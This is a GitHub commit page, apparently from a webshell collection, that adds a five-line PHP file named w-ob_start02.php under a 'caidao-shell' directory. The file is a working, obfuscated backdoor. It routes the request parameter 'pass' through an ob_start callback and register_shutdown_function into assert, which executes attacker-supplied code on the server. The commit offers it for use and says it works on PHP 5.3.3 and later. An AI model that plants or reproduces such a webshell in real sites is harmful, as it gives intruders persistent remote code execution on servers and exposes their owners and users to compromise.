Skip to content

Commit

Permalink
add w-ob_start02.php
Browse files Browse the repository at this point in the history
author : isno
from : wooyun.org

success running PHP5.3.3 >=
  • Loading branch information
tennc committed Oct 29, 2015
1 parent e046b28 commit 0d5688e
Showing 1 changed file with 5 additions and 0 deletions.
5 changes: 5 additions & 0 deletions caidao-shell/w-ob_start02.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
<?php
ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
echo $_REQUEST['pass'];
ob_end_flush();
?>

0 comments on commit 0d5688e

Please sign in to comment.